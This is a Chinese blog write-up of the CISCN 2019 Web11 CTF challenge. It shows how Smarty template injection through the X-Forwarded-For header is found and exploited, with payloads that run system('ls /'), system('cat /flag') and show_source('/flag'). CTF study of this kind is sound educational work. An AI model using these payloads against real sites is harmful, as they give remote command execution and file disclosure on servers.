[CISCN 2019华东南]Web11

最新推荐文章于 2024-06-02 11:15:53 发布
最新推荐文章于 2024-06-02 11:15:53 发布
阅读量602 收藏 10
点赞数 8
分类专栏: ctf 文章标签: web安全 网络安全 Smarty
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73612768/article/details/135317107
版权

[CISCN 2019华东南]Web11 wp

信息搜集

页面内容如下:

在这里插入图片描述

右上角显示的是我的当前 IP 。

在最下角提示:Build With Smarty !

在这里插入图片描述

Smarty 是 PHP 的一个模板引擎,那么这道题应该是 Smarty 模板注入。

Smarty 模板注入

可以参考博客:Smarty模板注入&CVE-2017-1000480

左上角既然能提取我的 IP ,那么根据页面内容稍微猜一下,应该是从 XFF 头提取 IP ,假设没有设置 XFF 头,提取的就是真实 IP 。

发个包测试一下:

在这里插入图片描述

说明这里确实会读取 XFF 头。

既然已经知道是 Smarty 模板引擎,那么就直接测试:

a{*comment*}b

在这里插入图片描述

返回结果是 ab ,测试成功。

查看 Smarty 版本:
{$smarty.version}

在这里插入图片描述

当前版本号为 3.1.30 。

if 语句执行 PHP 代码:

这个版本许多方法不可行,因此直接用 if 语句执行 PHP 代码:

{if phpinfo()}{/if}

在这里插入图片描述

值得注意的是 if 里面不用带分号。

这样的话就直接查看根目录下的文件:

{if system('ls /')}{/if}

在这里插入图片描述

在根目录下找到了 flag 文件。

查看 flag :

{if system('cat /flag')}{/if}

在这里插入图片描述

不回显,flag 看不了。

可能是过滤了 flag ,但是尝试了 {if system('cat /fl\ag')}{/if} 也不行

也可能是其他的原因,尝试了以下方法:

{if readfile ('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat /flag')}{/if}
{if file_get_contents('/flag')}{/if}

最后是:{if show_source('/flag')}{/if} 成功回显了:

在这里插入图片描述

拿到 flag 。

妙尽璇机
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
华东师范大学2019 839.docx
06-25
华东师范大学计算机技术(085211)839 2019年真题回忆版以及答案
buuctf | CISCN2019华东web11
菜鸡一枚
03-07 109
SSTI服务器端模板注入(Smarty模块)
[CISCN2019 华东赛区]Web11
pakho_C的博客
08-02 578
smart是php的模板引擎,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造sstipayload。Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,那么我们可以使用{php}{/php}标签来构造payload,但是本题会报错。每个{if}必须有一个配对的{/if}.也可以使用{else}和{elseif}....
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 616
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
BUUCTF:[CISCN2019 华东赛区]Web4
末初的CSDN博客
07-29 2065
题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web4 这种路由处理方式并不像是PHP,尝试了file:///etc/passwd没有效果,猜测Flask,尝试local_file:///读取文件 读取源码: import re, random, uuid, urllib from flask import Flask, session, request app
BUUCTF-WEBCISCN2019 华东赛区】Web11 1
qq_36410265的博客
02-08 285
其实打开这张页面,我并不知道这道题是什么类型。只好先用bp去请求这两个接口。请求xff的时候,我添加了 xff头,值为127.0.0.1。回显了127.0.0.1。我就猜到是模板注入题了,加上页面上的关键字。,Smarty模板注入题,找了几个payload,没什么过滤,直接就回显了。以为这道题跟ikun那道题一样,考的知识点很多,是我想得复杂了。
BUUCTF [CISCN2019 华东赛区]Web4
SanKobe的博客
05-24 261
注意这里有个坑,目标地址设备是用python2跑的,而我这里是python3,之前我一直用这个当SECRET_KEY,然后一直跑不出flag,百度了一下,python2和python3 random出来的位数是不一样的。最近打比赛遇到了flask_session伪造相关的题目,没学过,又碰巧随机挑了道BUUCTF的题目正好考的flask_session伪造,看完各位师傅的WP后,进行一次自我总结。百度了一下linux下设备网卡地址在/sys/class/net/eth0/address下。
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2629
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
[CISCN2019 华东赛区]Web4
m0_62905261的博客
08-31 707
[CISCN2019 华东赛区]Web4
[CISCN2019 华东赛区]Double Secret
Sk1y的博客
02-08 1069
[CISCN2019 华东赛区]Double Secret 知识点:SSTI,RC4加密 文章目录[CISCN2019 华东赛区]Double Secret解题过程参考链接 解题过程 打开环境,提示secret 尝试secret路由,提示会加密 GET方式传参url/secret?secret=1,回显 传参url/secret?secret=11111,报错 传入的参数secret会被RC4解密,而此时也存在python2.7的模板注入漏洞render_template_string if(s
[CISCN2019 华东赛区]Web11 wp
m0_55185160的博客
03-25 3040
打开题目看到X-Forwarded-For,便想到利用burpsuite,修改X-Forwarded-For 看到确实有回显,还可以看到Build With Smarty !这时想到在学flask ssti中学习到ssti中也有smarty的ssti。 发现在current ip:56说明存在ssti,在利用7{*comment*}7测试一下是否是smarty 然后就可以利用smarty的ssti方式进行命令执行了 payload:{if system('cat /flag')}{/..
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
华东师范大学2019计算机考研839试卷及答案
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
华东师范大学计算机考研复试机试习题
03-19
华东师范大学计算机考研:计算机系、数据学院复试机试历年真题以及AC代码。历年学长总结得到。适用学院:计算机学院、数据学院。软件学院也可参考。
渗透测试之Web安全系列教程(一)
最新发布
fearhacker的专栏
06-02 609
script 标签 的 src 属性,指向跨域脚本的URL地址!如果客户端,是我们自己编制的浏览器,或者是自己编制的可以解析网页内容的脚本,那么,我们是可以突破同源策略限制的!由于 浏览器的同源策略,并没有对 script 等标签进行同源限制,这导致了 恶意黑客 可以利用这一特性,并通过一些 Web 网站中所存在的XSS注入漏洞,将一些恶意的代码(包含 script 相关内容,而 script 的 src 属性的值,可能是指向某个其它域的、包含木马脚本的URL地址)内容嵌入到 Web 网站的指定页面中。
网络安全VIP>第一篇《工业互联网安全
Else 的博客
05-28 968
工业互联网的网络是基础,平台是核心,安全是保障。信息化会提高工业化的生产效率,但信息化本身具备两面性。一方面它可以让信息交互更加顺畅,共享更加快捷;但另一方面是带来相应的安全威胁。
HFish蜜罐实践:网络安全防御的主动出击
weixin_43822401的博客
05-29 622
HFish蜜罐作为一种主动防御工具,通过模拟易受攻击的服务,吸引攻击者,不仅能有效捕获攻击行为,还能为安全分析和溯源提供宝贵信息。HFish蜜罐作为一种先进的网络安全防御工具,不仅能够有效地捕获和分析攻击行为,还能为安全专家提供攻击溯源的重要线索。为每个节点配置蜜罐服务,如FTP、SSH、Telnet等,这些服务作为诱饵,用于吸引并捕获攻击者的行为。收集所有连接和攻击节点的IP信息,通过分析这些信息,刻画攻击者画像,构建私有情报库。利用攻击者使用的工具漏洞,进行信息提取和溯源,确定攻击者的身份和来源。
网络安全等级保护,三级等保技术建议书(word原件获取)
2302_79423711的博客
06-02 260
本文末个人名片直接获取所有资料。
2024华东杯数学建模
05-03
2024华东杯数学建模是一项面向大学生的数学建模竞赛活动,旨在培养学生的数学建模能力和团队合作精神。该比赛通常由华东地区的高校或研究机构主办,参赛队伍来自各个大学。 在比赛中,参赛队伍需要根据给定的实际...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值